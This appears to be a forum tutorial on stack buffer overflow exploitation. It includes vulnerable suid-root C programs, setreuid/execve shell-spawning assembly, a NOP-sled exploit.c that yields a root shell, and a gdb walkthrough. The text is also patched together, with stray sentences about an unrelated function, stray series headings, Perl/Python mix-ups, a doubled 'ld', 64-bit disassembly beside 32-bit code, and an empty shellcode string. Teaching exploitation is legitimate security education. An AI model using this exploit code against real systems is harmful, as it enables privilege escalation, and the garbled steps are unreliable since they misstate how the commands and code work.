Exploit Development 101

Introduction

This article will describe how to develop exploits to target specific vulnerabilities, There are many challenges that you may face when writing malicious code to target specific vulnerabilities, I will go through several phases of exploit development and arrive at a working exploit.

Overview

When writing exploits, we often need to find overflows in programs. These bugs often occur in either buffer overflows or stack overflows, and when this happens we look for two things: our buffer needs to overwrite EIP (the current instruction pointer), and one of the CPU registers needs to contain our buffer. Any of the x86 CPU registers can store our buffer, so long as we remember which one!

  • By starting with the vulnerable code, we can make the explanation more clear and easy to follow.
void overflow_function (char *str)
{
  char buffer[20];

  strcpy(buffer, str);  // Function that copies str to buffer
}

int main()
{
  char big_string[128];
  int i;

  for(i=0; i < 128; i++)  // Loop 128 times
  {
    big_string[i] = 'A'; // And fill big_string with 'A's
  }
  overflow_function(big_string);
  exit(0);
}

The function tries to write 128 bytes of data into the 20-byte buffer, the extra 108 bytes spill out, overwriting the stack frame pointer, the return address, and the str pointer function argument. Then, when the function finishes, the program attempts to jump to the return address, which is now filled with As, which is 0x41 in hexadecimal. The program tries to return to this address, causing the EIP to go to 0x41414141, which is basically just some random address that is either in the wrong memory space or contains invalid instructions, causing the program to crash and die. This is called a stack-based overflow, because the overflow is occurring in the stack memory segment.

when overflow_function() is called the stack frame looks something like this:

 _________          ____________________		 	___________________________
|         |		   |            		|          |      					   |          
| buffer  |------->|return address (ret)| -------> | Stack frame pointer (sfp) | 
|         |        |            		|          | 						   | 
|_________|        |____________________|          |___________________________| 
       _________________________                              
	  |							|
--->  |  *str (function arg)    | -----> [[[The Rest of the Stack]]]
	  |                         |
	  |_________________________| 
	  
	  										Figure 1 

The program crashing as a result of a stack-based overflow isn’t really that interesting, but the reason it crashes is. If the return address were controlled and overwritten with something other than 0x41414141, such as an address where actual executable code was located, then the program would “return” to and execute that code instead of dying. And if the data that overflows into the return address is based on user input, such as the value entered in a username field, the return address and the subsequent program execution flow can be controlled by the user.

Because it’s possible to modify the return address to change the flow of execution by overflowing buffers, all that’s needed is something useful to execute. This is where bytecode injection comes into the picture. Bytecode is just a cleverly designed piece of assembly code that is self-contained and can be injected into buffers, The most common piece of bytecode is known as shellcode. This is a piece of bytecode that just spawns a shell. If a suid root program is tricked into executing shellcode, the attacker will have a user shell with root privileges, while the system believes the suid root program is still doing whatever it was supposed to be doing

The function takes a string as its argument and returns a heap-allocated copy of the string with all uppercase letters converted to lowercase. However, no size control takes place and anything more than 64 chars size causes the issue.

int main(int argc, char *argv[])
{
  char buffer[500];
  strcpy(buffer, argv[1]);
  return 0;
}

The program really does nothing, except mismanage memory. Now to make it truly vulnerable, the ownership must be changed to the root user, and the suid permission bit must be turned on for the compiled binary:

$ sudo chown root f00
$ sudo chmod +s f00
$ ls -l f00
-rwsr-sr-x   1 root   users   4933 Sep 5 15:22 f00

it would work on root’s privileges even if executed by “normal” user. Exploiting
stack buffer overflow vulnerability we can run shell on root’s privileges! How to achieve this? We will write an exploit:
At first we must create special binary code named “shellcode”, which’s purpose will be to give us root privileges, This means the actual address of the shellcode must be known ahead of time, which can be difficult to know in a dynamically changing stack. To make things even harder, the four bytes where the return address is stored in the stack frame must be overwritten with the value of this address. Even if the correct address is known, but the proper location isn’t overwritten, the program will just crash and die. Two techniques are commonly used to assist with this difficult chicanery.

The first is known as a NOP sled (NOP is short for no operation). This is a single byte instruction that does absolutely nothing. These are sometimes used to waste computational cycles for timing purposes and are actually necessary in the Sparc processor architecture due to instruction pipelining. In this case, these NOP instructions are going to be used for a different purpose; they’re going to be used as a fudge factor. By creating a large array (or sled) of these NOP instructions and placing it before the shellcode, if the EIP returns to any address found in the NOP sled, the EIP will increment while executing each NOP instruction, one at a time, until it finally reaches the shellcode. This means that as long as the return address is overwritten with any address found in the NOP sled, the EIP will slide down the sled to the shellcode, which will execute properly.

The second technique is flooding the end of the buffer with many back-to-back instances of the desired return address. This way, as long as any one of these return addresses overwrites the actual return address, the exploit will work as desired.

Here is a representation of a crafted buffer:

 __________	         ___________            _________________________
|		   |        |           |          |                         |
| NOP sled |  --->  | ShellCode |  --->    | Repeated return address |
|		   |        |           |          |                         |
|__________|        |___________|          |_________________________|

									Figure 2 

Even using both of these techniques, the approximate location of the buffer in memory must be known in order to guess the proper return address. One technique for approximating the memory location is to use the current stack pointer as a guide. By subtracting an offset from this stack pointer, the relative address of any variable can be obtained. Because, in this vulnerable program, the first element on the stack is the buffer the shellcode is being put into, the proper return address should be the stack pointer, which means the offset should be close to 0. The NOP sled becomes increasingly useful when exploiting more complicated programs, when the offset isn’t 0.

Writing shellcode

The shellcode must be self-contained and must avoid null bytes, because these will end the string. If the shellcode has a null byte in it, a strcpy() function will recognize that as the end of the string. In order to write a piece of shellcode, an understanding of the assembly language of the target processor is needed. In this case, it’s x86 assembly language, and while this book can’t explain x86 assembly in depth, it can explain a few of the salient points needed to write bytecode.

Assembly Instructions

Instructions in nasm-style syntax generally follow the style of:

instruction ,

The following are some instructions that will be used in the construction of shellcode.

mov Move instruction Used to set initial values
  	mov <dest>, <src> Move the value from <src> into <dest>

add Add instruction Used to add values
  	add <dest>, <src> Add the value in <src> to <dest>

sub Subtract instruction Used to subtract values
    sub <dest>, <src> Subtract the value in <src> from <dest>

push  Push instruction Used to push values to the stack
  	  push <target> Push the value in <target> to the stack

pop Pop instruction Used to pop values from the stack pop <target>
     Pop a value from the stack into <target> 

Programming for Wannabees. Part III. Your first Shell Code

In addition to the raw assembly instructions found in the processor, Linux provides the programmer with a set of functions that can be easily executed from assembly. These are known as system calls, and they are triggered by using interrupts. A listing of enumerated system calls can be found in /usr/include/asm/unistd.h

$ head -n 80 /usr/include/asm/unistd.h

#ifndef _ASM_I386_UNISTD_H_
#define _ASM_I386_UNISTD_H_

/*
 * This file contains the system call numbers.
 */

#define __NR_exit                1
#define __NR_fork                2
#define __NR_read                3
...

Using the few simple assembly instructions explained in the previous section and the system calls found in unistd.h, many different assembly programs and pieces of bytecode can be written to perform many different functions.

Shell-Spawning

Shell-spawning code is simple code that executes a shell. This code can be converted into shellcode. The two functions that will be needed are execve() and setreuid(), which are system call numbers 11 and 70 respectively. The execve() call is used to actually execute /bin/sh. The setreuid() call is used to restore root privileges, in case they are dropped. Many suid root programs will drop root privileges whenever they can for security reasons, and if these privileges aren’t properly restored in the shellcode, all that will be spawned is a normal user shell.

There’s no need for an exit() function call, because an interactive program is being spawned. An exit() function wouldn’t hurt, but it has been left out of this example, because ultimately the goal is to make this code as small as possible.

shell.asm

section .data    ; section declaration

filepath    db   "/bin/shXAAAABBBB"       ; the string

section .text    ; section declaration

global _start ; Default entry point for ELF linking

_start:

; setreuid(uid_t ruid, uid_t euid)

 mov eax, 70       ; put 70 into eax, since setreuid is syscall #70
 mov ebx, 0        ; put 0 into ebx, to set real uid to root
 mov ecx, 0        ; put 0 into ecx, to set effective uid to root
 int 0x80          ; Call the kernel to make the system call happen

; execve(const char *filename, char *const argv [], char *const envp[])

 mov eax, 0        ; put 0 into eax
 mov ebx, filepath ; put the address of the string into ebx
 mov [ebx+7], al   ; put the 0 from eax where the X is in the string
                   ; ( 7 bytes offset from the beginning)
 mov [ebx+8], ebx  ; put the address of the string from ebx where the
                   ; AAAA is in the string ( 8 bytes offset)
 mov [ebx+12], eax ; put the a NULL address (4 bytes of 0) where the
                   ; BBBB is in the string ( 12 bytes offset)
 mov eax, 11       ; Now put 11 into eax, since execve is syscall #11
 lea ecx, [ebx+8]  ; Load the address of where the AAAA was in the
                   ; string into ecx
 lea edx, [ebx+12] ; Load the address of where the BBBB is in the
                   ; string into edx
 int 0x80          ; Call the kernel to make the system call happen

This code is a little bit more complex than the previous example. The first set of instructions that should look new are these:

mov [ebx+7], al    ; put the 0 from eax where the X is in the string
                   ; ( 7 bytes offset from the beginning)
mov [ebx+8], ebx   ; put the address of the string from ebx where the
                   ; AAAA is in the string ( 8 bytes offset)
mov [ebx+12], eax  ; put the a NULL address (4 bytes of 0) where the
                   ; BBBB is in the string ( 12 bytes offset)

The [ebx+7], tells the computer to move the source value into the address found in the EBX register, but offset by 7 bytes from the beginning. The use of the 8-bit AL register instead of the 32-bit EAX register tells the assembler to only move the first byte from the EAX register, instead of all 4 bytes. Because EBX already has the address of the string “/bin/shXAAAABBBB”, this instruction will move a single byte from the EAX register into the string at the seventh position, right over the X, as seen here:

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
/ b i n / s h X A A  A  A  B  B  B  B

The next two instructions do the same thing, but they use the full 32-bit registers and offsets that will cause the moved bytes to overwrite “AAAA” and “BBBB” in the string, respectively. Because EBX holds the address of the string, and EAX holds the value of 0, the “AAAA” in the string will be overwritten with the address of the beginning of the string, and “BBBB” will be overwritten with zeros, which is a null address.

The next two instructions that should look new are these:

lea ecx, [ebx+8]  ; Load the address of where the AAAA was in the
                  ; string into ecx
lea edx, [ebx+12] ; Load the address of where the BBBB is in the
                  ; string into edx

These are load effective address (lea) instructions, which copy the address of the source into the destination. In this case, they copy the address of “AAAA” in the string into the ECX register, and the address of “BBBB” in the string into the EDX register. This apparent assembly language prestidigitation is needed because the last two arguments for the execve() function need to be pointers of pointers. This means the argument should be an address to an address that contains the final piece of information. In this case, the ECX register now contains an address that points to another address (where “AAAA” was in the string), which in turn points to the beginning of the string. The EDX register similarly contains an address that points to a null address (where “BBBB” was in the string).

Now let’s try to assemble and link this piece of code to see if it works.

$ nasm -f elf shell.asm
$ ld ld -m elf_i386 -o shell shell.o
$ ./a.out
sh-2.05a$ exit
exit
$ sudo chown root a.out
$ sudo chmod +s a.out
$ ./a.out
sh-2.05a#

The program spawns a shell as it should. And if the program’s owner is changed to root and the suid permission bit is set, it spawns a root shell, Excellent now let’s extract the shellcode

objdump -M intel -d shell | grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' 

Avoiding Using Other Segments

The program spawns a shell, but this code is still a long way from being proper shellcode. The biggest problem is that the string is being stored in the data segment. This is fine if a standalone program is being written, but shellcode isn’t a nice executable program — it’s a sliver of code that needs to be injected into a working program to properly execute. The string from the data segment must be stored with the rest of the assembly instructions somehow, and then a way to find the address of this string must be discovered. Worse yet, because the exact memory location of the running shellcode isn’t known, the address must be found relative to the EIP. Luckily, the jmp and call instructions can use addressing relative to the EIP. Both of these instructions can be used to get the address of a string relative to the EIP, found in the same memory space as the executing instructions.

A call instruction will move the EIP to a certain location in memory, just like a jmp instruction, but it will also push the return address onto the stack so the program execution can continue after the call instruction. If the instruction after the call instruction is a string instead of an instruction, the return address that is pushed to the stack could be popped off and used to reference the string instead of being used to return.

It works like this: At the beginning of program execution, the program jumps to the bottom of the code where a call instruction and the string are located; the address of the string will be pushed to the stack when the call instruction is executed. The call instruction jumps the program execution back up to a relative location just below the prior jump instruction, and the string’s address is popped off the stack. Now the program has a pointer to the string and can do its business, while the string can be neatly tucked at the end of the code.

In assembly it looks something like this:

jmp two
one:
pop ebx
<program code here>
two:
call one
db 'this is a string'

First the program jumps down to two, and then it calls back up to one, while pushing the return address (which is the address of the string) onto the stack. Then the program pops this address off the stack into EBX, and it can execute whatever code it desires.

The stripped-down shellcode using the call trick to get an address to the string looks something like this:

shellcode.asm

BITS 32

; setreuid(uid_t ruid, uid_t euid)

 mov eax, 70        ; put 70 into eax, since setreuid is syscall #70
 mov ebx, 0         ; put 0 into ebx, to set real uid to root
 mov ecx, 0         ; put 0 into ecx, to set effective uid to root
 int 0x80           ; Call the kernel to make the system call happen

 jmp short two      ; Jump down to the bottom for the call trick
one:
 pop ebx            ; pop the "return address" from the stack
                    ; to put the address of the string into ebx

; execve(const char *filename, char *const argv [], char *const envp[])
 mov eax, 0         ; put 0 into eax
 mov [ebx+7], al    ; put the 0 from eax where the X is in the string
                    ; ( 7 bytes offset from the beginning)
 mov [ebx+8], ebx   ; put the address of the string from ebx where the
                    ; AAAA is in the string ( 8 bytes offset)
 mov [ebx+12], eax  ; put a NULL address (4 bytes of 0) where the
                    ; BBBB is in the string ( 12 bytes offset)
 mov eax, 11        ; Now put 11 into eax, since execve is syscall #11
 lea ecx, [ebx+8]   ; Load the address of where the AAAA was in the string
                    ; into ecx
 lea edx, [ebx+12]  ; Load the address of where the BBBB was in the string
                    ; into edx
 int 0x80           ; Call the kernel to make the system call happen
two:
 call one           ; Use a call to get back to the top and get the
 db '/bin/shXAAAABBBB'       ; address of this string

Still isn’t usable as shellcode yet we need to removing Null Bytes let’s examine the code in a hex editor

$ nasm shellcode.asm
$ hexeditor shellcode

00000000 B8 46 00 00 00 BB 00 00 00 00 B9 00 00 00 00 CD .F..............
00000010 80 EB 1C 5B B8 00 00 00 00 88 43 07 89 5B 08 89 ...[......C..[..
00000020 43 0C B8 0B 00 00 00 8D 4B 08 8D 53 0C CD 80 E8 C.......K..S....
00000030 DF FF FF FF 2F 62 69 6E 2F 73 68 58 41 41 41 41 ..../bin/shXAAAA
00000040 42 42 42 42                                     BBBB

Any null byte in the shellcode (the ones shown in bold) will be considered the end of the string, causing only the first 2 bytes of the shellcode to be copied into the buffer. In order to get the shellcode to copy into buffers properly, all of the null bytes must be eliminated.

Places in the code where the static value of 0 is moved into a register are obvious sources of null bytes in the assembled shellcode. In order to eliminate null bytes and maintain functionality, a method must be devised for getting the static value of 0 into a register without actually using the value 0. One potential option is to move an arbitrary 32-bit number into the register and then subtract that value from the register using the mov and sub instructions.

mov ebx, 0x11223344
sub ebx, 0x11223344

While this technique works, it also takes twice as many instructions, making the assembled shellcode larger than necessary. Luckily, there’s a solution that will put the value of 0 into a register using only one instruction: XOR. The XOR instruction performs an exclusive OR operation on the bits in a register.

An exclusive OR transforms bits as follows:

1 xor 1 = 0
0 xor 0 = 0
1 xor 0 = 1
0 xor 1 = 1

Because 1 XORed with 1 results in a 0, and 0 XORed with 0 results in a 0, any value XORed with itself will result in 0. So if the XOR instruction is used to XOR the registers with themselves, the value of 0 will be put into each register using only one instruction and avoiding null bytes. Linux Shellcoding (Part 1.0)

Now we’ve have some basic understanding on how to write shellcode and how it’s work let’s write an exploit

Writing Exploit

Writing an exploit program to exploit a program will certainly get the job done, but it does put a layer between the prospective hacker and the vulnerable program. The compiler takes care of certain aspects of the exploit, and having to adjust the exploit by making changes to a program removes a certain level of interactivity from the exploit process. In order to really gain a full understanding of this topic, which is so rooted in exploration and experimentation, the ability to quickly try different things is vital. Python print command and bash shell’s command substitution with grave accents are really all that are needed to exploit the vulnerable program.

Python is an interpreted programming language that has a print command that happens to be particularly suited to generating long sequences of characters. Perl can be used to execute instructions on the command line using the -c switch like this:

$ python3 -c 'print("A"*20)'
$ AAAAAAAAAAAAAAAAAAAA

This command simply prints the character A 20 times.

Any character, such as nonprintable characters, can also be printed by using \x##, where ## is the hexadecimal value of the character. In the following example, this notation is used to print the character A, which has the hexadecimal value of 0x41.

$ python3 -c 'print("\x41"*20)'
$ AAAAAAAAAAAAAAAAAAAA

In each case, the output of the command found between the grave accents is substituted for the command, and the command of uname is executed.

$ python3 -c 'import os; os.system("uname -a")'

All the exploit code really does is get the stack pointer, craft a buffer, and feed that buffer to the vulnerable program. Armed with python, command substitution, and an approximate return address, the work of the exploit code can be done on the command line by simply executing the vulnerable program and using grave accents to substitute a crafted buffer into the first argument.

Next you can run the app in gdb and get the stack address you need to return to
First set a breakpoint right after the strcpy

(gdb) disassemble main
Dump of assembler code for function main:
   0x0000555555555139 <+0>:     push   %rbp
   0x000055555555513a <+1>:     mov    %rsp,%rbp
   0x000055555555513d <+4>:     sub    $0x210,%rsp
   0x0000555555555144 <+11>:    mov    %edi,-0x204(%rbp)
   0x000055555555514a <+17>:    mov    %rsi,-0x210(%rbp)
   0x0000555555555151 <+24>:    mov    -0x210(%rbp),%rax
   0x0000555555555158 <+31>:    add    $0x8,%rax
   0x000055555555515c <+35>:    mov    (%rax),%rdx
   0x000055555555515f <+38>:    lea    -0x200(%rbp),%rax
   0x0000555555555166 <+45>:    mov    %rdx,%rsi
   0x0000555555555169 <+48>:    mov    %rax,%rdi
   0x000055555555516c <+51>:    call   0x555555555030 <strcpy@plt>
   0x0000555555555171 <+56>:    mov    $0x0,%eax
   0x0000555555555176 <+61>:    leave
   0x0000555555555177 <+62>:    ret

(gdb) b *0x555555555030
Breakpoint 1 at 0x555555555030
(gdb) run   `python3 -c 'print("\x90"*200)'`
Breakpoint 1, 0x0000555555555030 in strcpy@plt ()
(gdb) info register

The shellcode should then be appended to the NOP sled. It’s quite useful to have the shellcode existing in a file somewhere, so putting the shellcode into a file should be the next step. Because all the bytes are already spelled out in hexadecimal in the beginning of the exploit, these bytes just need to be written to a file

$ ./f00  `python3 -c 'print "\x90"*22+"shellcode"'`
sh-2.05a# whoami
root
sh-2.05a#

exploit.c

#include <stdlib.h>

char shellcode[] = "";

unsigned long sp(void)         // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer

int main(int argc, char *argv[])
{
  int i, offset;
  long esp, ret, *addr_ptr;
  char *buffer, *ptr;

  offset = 0;                 // Use an offset of 0
  esp = sp();                 // Put the current stack pointer into esp
  ret = esp - offset;         // We want to overwrite the ret address

  printf("Stack pointer (ESP) : 0x%x\n", esp);
  printf("    Offset from ESP : 0x%x\n", offset);
  printf("Desired Return Addr : 0x%x\n", ret);

// Allocate 600 bytes for buffer (on the heap)
  buffer = malloc(600);

// Fill the entire buffer with the desired ret address
  ptr = buffer;
  addr_ptr = (long *) ptr;
  for(i=0; i < 600; i+=4)
  { *(addr_ptr++) = ret; }


// Fill the first 200 bytes of the buffer with NOP instructions
  for(i=0; i < 200; i++)
  { buffer[i] = '\x90'; }

// Put the shellcode after the NOP sled
  ptr = buffer + 200;
  for(i=0; i < strlen(shellcode); i++)
  { *(ptr++) = shellcode[i]; }

// End the string
  buffer[600-1] = 0;

// Now call the program ./f00 with our crafted buffer as its argument
  execl("./f00", "f00", buffer, 0);

// Free the buffer memory
  free(buffer);

  return 0;
}

Here are the results of the exploit code’s compilation and subsequent execution:

$ gcc -o exploit exploit.c
$ ./exploit
Stack pointer (ESP) : 0xfccd89b0
    Offset from ESP : 0x0
Desired Return Addr : 0xfccd89b0
sh-2.05a# whoami
root
sh-2.05a#

Apparently it worked. The return address in the stack frame was overwritten with the value 0xfccd89b0, which happens to be the address of the NOP sled and shellcode. Because the program was suid root, and the shellcode was designed to spawn a user shell, the vulnerable program executed the shellcode as the root user.

End

That’s all for now. I hope you learned something from this, This is a big topic, and this is just a little bit of what it covers. Hopefully, you’re now familiar with the concept of stack-based overflows, shellcode and you can recognize some basic Assembly instructions.

14 Likes

I love this kind of beautiful please post and let me learn more about this thankyou

4 Likes

This topic was automatically closed after 121 days. New replies are no longer allowed.